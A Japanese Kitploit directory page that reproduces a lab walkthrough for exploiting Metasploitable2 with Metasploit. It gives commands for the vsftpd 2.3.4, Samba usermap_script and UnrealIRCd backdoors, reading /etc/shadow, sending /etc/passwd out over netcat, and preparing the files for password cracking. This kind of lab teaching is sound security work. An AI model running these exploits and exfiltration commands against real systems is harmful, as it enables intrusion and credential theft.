Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
metasploitable2-exploitation-metasploit — MetasploitによるMetasploitable2に対する完全なエクスプロイトウォークスルー — vsftpdバックドア、Samba CVE-2007-2447、UnrealIRCdバックドア、Netcatによるデータ流出、および認証情報クラッキングの準備。 | Kitploit
ツール/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
パスワードクラッキング偵察エクスプロイトフレームワークネットワークマッピング脆弱性分析エクスプロイトデータ流出ペネトレーションテストコマンド&コントロール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
学習と教育
ペイロード開発
ラボと実践
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

MetasploitによるMetasploitable2に対する完全なエクスプロイトウォークスルー — vsftpdバックドア、Samba CVE-2007-2447、UnrealIRCdバックドア、Netcatによるデータ流出、および認証情報クラッキングの準備。

リポジトリを見る
1ヶ月前未レビュー

Exploiting Metasploitable2 with Metasploit: VSFTPD, Samba, and More

Metasploit Framework を用いた実践的な攻略手順 — PostgreSQL データベースのセットアップ、db_nmap スキャン、vsftpd・Samba・UnrealIRCd による 3 つの root シェル、Netcat を使った認証情報の流出までを解説します。


概要

このリポジトリは、隔離された VirtualBox ラボ内の Metasploitable2 に対する Metasploit の完全なエンゲージメントを文書化したものです。取り扱うトピック:

  • PostgreSQL バックエンドとワークスペースを用いた Metasploit のセットアップ
  • db_nmap を実行してスキャン結果をデータベースに直接保存
  • vsftpd 2.3.4 バックドア (サプライチェーン侵害) の悪用
  • Samba CVE-2007-2447 (usermap_script コマンドインジェクション) の悪用
  • Netcat 経由で /etc/passwd と /etc/shadow を流出させ、unshadow で結合
  • UnrealIRCd 3.2.8.1 バックドアの悪用

ラボ環境

マシン役割IP アドレス
Kali Linux 2026.1攻撃者192.168.1.4
Metasploitable2標的192.168.1.3

ネットワーク: 192.168.1.0/24 — VirtualBox 内の完全に隔離された NAT ネットワーク。


手順 1 — Metasploit のセットアップとデータベース連携スキャン

root@kitploit:~
# PostgreSQL を起動し、データベースを初期化 (初回のみ)
sudo systemctl start postgresql
sudo msfdb init

# Metasploit を起動
msfconsole

Kali と Metasploitable2 の起動

Kali のアップデートと PostgreSQL の起動

root@kitploit:~
msf6> db_status           # 確認: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # アクティブなワークスペースの確認

db_status と workspace の出力

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

db_nmap スキャン実行中

root@kitploit:~
msf6> hosts
msf6> services

hosts と services の出力

Metasploitable2 上で 2 つの FTP サーバーを発見:

ポートサービス情報
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

手順 2 — vsftpd 2.3.4 の悪用 (バックドア)

2011 年 7 月、vsftpd 2.3.4 のソースアーカイブが侵害され、FTP ユーザー名に :) が含まれているとポート 6200 で root シェルが開くバックドアが挿入されました。CVE: CVE-2011-2523。 コード差分: https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# 結果: exploit/unix/ftp/vsftpd_234_backdoor (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

vsftpd エクスプロイト情報 - その1

vsftpd エクスプロイト情報 - その2

vsftpd show options

vsftpd set RHOSTS RPORT LHOST

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

vsftpd エクスプロイトの実行と Meterpreter セッション

リモートの root ファイルシステム上で ls を実行

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami root と uname -a の出力

ハッシュ化されたパスワードの抽出:

root@kitploit:~
cat /etc/shadow | grep '$1'

shadow ファイルのハッシュ化パスワード


手順 3 — Samba CVE-2007-2447 の悪用

Samba バージョン 3.0.0~3.0.25rc3 では、認証前にユーザー名フィールド内のシェルメタ文字が username map script オプションを介して直接 /bin/sh に渡されます。Metasploitable2 は Samba 3.0.20-Debian を実行しています。

root@kitploit:~
msf6> search type:exploit name:samba
# 約 7 個のエクスプロイトが見つかる

msf6> use exploit/multi/samba/usermap_script
msf6> info

search で見つかった Samba エクスプロイト一覧

Samba usermap_script の情報

Samba CVE の説明と参考文献

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Samba エクスプロイトの実行 - セッション確立

Samba シェルでの whoami root と smbd --version

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Netcat によるファイル流出

タブ 2 — Kali (受信側):

root@kitploit:~
nc -l -p 4567 > passwd.txt

タブ 1 — エクスプロイトシェル (送信側):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Kali 上で passwd を受信している Netcat リスナー

流出後の passwd.txt の内容

/etc/shadow についても繰り返し、その後結合:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

手順 4 — UnrealIRCd 3.2.8.1 の悪用 (バックドア)

UnrealIRCd 3.2.8.1 は、ソースコードにバックドアが混入された状態で配布されました。ポート 6667 に AB を送信すると、サーバーは後続のコマンドを認証なしで root 権限で実行します。

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

UnrealIRCd エクスプロイトのオプションと実行

UnrealIRCd root シェル - whoami と uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

必要なオプション:

オプション

Metasploit ワークフロー概要

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

よくあるミス


重要ポイント

  • vsftpd 2.3.4 と UnrealIRCd 3.2.8.1 はどちらもサプライチェーン侵害(公式配布アーカイブに組み込まれたバックドア)の事例である
  • Samba の CVE-2007-2447 は認証前に発動するため、パッチ適用が唯一の緩和策である
  • Netcat は依存関係が不要で、ほぼすべての Unix システムでファイル流出に使用できる
  • exploit 前に info を確認する習慣は重要 — CVE、影響を受けるバージョン、必要なオプションが表示される

🌐 私とつながる

LinkedIn Dev.to

ツールをダウンロード
値
説明
RHOSTS192.168.1.3標的の IP
RPORT6667IRC のデフォルトポート
LHOST192.168.1.4Kali リスナーの IP
payloadcmd/unix/bind_netcatNetcat によるバインドシェル
ミス結果修正方法
msfdb init をスキップするデータベースなし — スキャン結果が保存されない初回使用前に sudo msfdb init を一度実行
LHOST を設定しないリバースシェルのコールバック先がない必ず LHOST を自身の Kali IP に設定
毎回 msfdb init を実行する既存データが上書きされる一度だけ実行し、sudo msfdb status で確認
間違った RPORTエクスプロイトが静かに失敗するservices でポートを確認してから設定
Netcat リスナーを早く閉じるファイル転送が途中で切れるパイプコマンド後、CTRL-C の前に少し待つ
unshadow をスキップするパスワードクラッカーが分割ファイル形式を拒否する必ず passwd と shadow を先に結合